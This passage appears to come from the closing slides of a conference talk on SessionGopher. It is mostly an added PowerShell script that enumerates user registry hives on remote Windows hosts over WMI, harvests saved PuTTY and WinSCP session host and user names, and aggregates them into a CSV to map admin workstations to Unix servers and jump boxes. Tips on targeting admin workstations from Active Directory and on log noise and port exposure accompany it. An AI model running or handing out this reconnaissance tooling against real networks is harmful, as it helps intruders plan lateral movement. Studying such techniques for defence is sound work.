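The remote collection and CSV aggregation of the last two slides, as an added example that is not SessionGopher's own code: it uses `StdRegProv` over `Invoke-WmiMethod` to list the user hives loaded under HKEY_USERS on each target, walks every user's PuTTY and WinSCP session keys, reads `HostName` and `UserName`, and writes one CSV, which is the map of which Windows host manages which Unix box. It needs local admin on the targets and DCOM reachability; the target names are placeholders.

```powershell
# Added example: remote registry via WMI StdRegProv, aggregated to one CSV.
$HKU = [uint32]2147483651          # HKEY_USERS root handle for StdRegProv (0x80000003)
$SessionKeys = @{
    PuTTY  = 'Software\SimonTatham\PuTTY\Sessions'
    WinSCP = 'Software\Martin Prikryl\WinSCP 2\Sessions'
}

function Get-RemoteRegSubKey([string]$ComputerName, [string]$SubKey) {
    $r = Invoke-WmiMethod -ComputerName $ComputerName -Namespace 'root\default' -Class StdRegProv `
            -Name EnumKey -ArgumentList $HKU, $SubKey -ErrorAction Stop
    if ($r.ReturnValue -ne 0 -or -not $r.sNames) { return @() }
    return @($r.sNames)
}

function Get-RemoteRegString([string]$ComputerName, [string]$SubKey, [string]$ValueName) {
    $r = Invoke-WmiMethod -ComputerName $ComputerName -Namespace 'root\default' -Class StdRegProv `
            -Name GetStringValue -ArgumentList $HKU, $SubKey, $ValueName -ErrorAction Stop
    if ($r.ReturnValue -ne 0) { return $null }
    return $r.sValue
}

function Get-RemoteSavedSession {
    param([Parameter(Mandatory)][string[]]$ComputerName)
    foreach ($c in $ComputerName) {
        try { $sids = Get-RemoteRegSubKey $c '' }
        catch { Write-Warning "$c`: $($_.Exception.Message)"; continue }
        # Real user hives only: skip the S-1-5-18/19/20 service accounts and the *_Classes hives
        foreach ($sid in ($sids | Where-Object { $_ -match '^S-1-5-21-' -and $_ -notmatch '_Classes$' })) {
            foreach ($tool in $SessionKeys.Keys) {
                $base = "$sid\$($SessionKeys[$tool])"
                foreach ($session in (Get-RemoteRegSubKey $c $base)) {
                    [pscustomobject]@{
                        ComputerName = $c
                        Sid          = $sid
                        Tool         = $tool
                        Session      = [uri]::UnescapeDataString($session)   # PuTTY stores "my%20box"
                        HostName     = Get-RemoteRegString $c "$base\$session" 'HostName'
                        UserName     = Get-RemoteRegString $c "$base\$session" 'UserName'
                    }
                }
            }
        }
    }
}

# Usage (placeholder targets; in practice feed it the admin workstations found in AD):
# Get-RemoteSavedSession -ComputerName 'WKS-LINUXADMIN01', 'WKS-LINUXADMIN02', 'JUMP01' |
#     Export-Csv -Path .\sessions.csv -NoTypeInformation
# Which Unix hosts are reachable from the most Windows hosts, i.e. the jump boxes:
# Import-Csv .\sessions.csv | Group-Object HostName | Sort-Object Count -Descending | Select-Object Name, Count
```

Every `EnumKey` and `GetStringValue` is a separate DCOM round trip, so a large sweep is slow and noisy in the WMI activity logs on the targets; `Invoke-CimMethod` over WinRM does the same calls with fewer open ports. The same walk only sees hives that are loaded on the target at that moment, which is the caveat from the HKEY_USERS slide.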
Slide 51: QUESTIONS? Twitter: @arvanaghi. GitHub: https://github.com/fireeye/SessionGopher. Brandon Arvanaghi
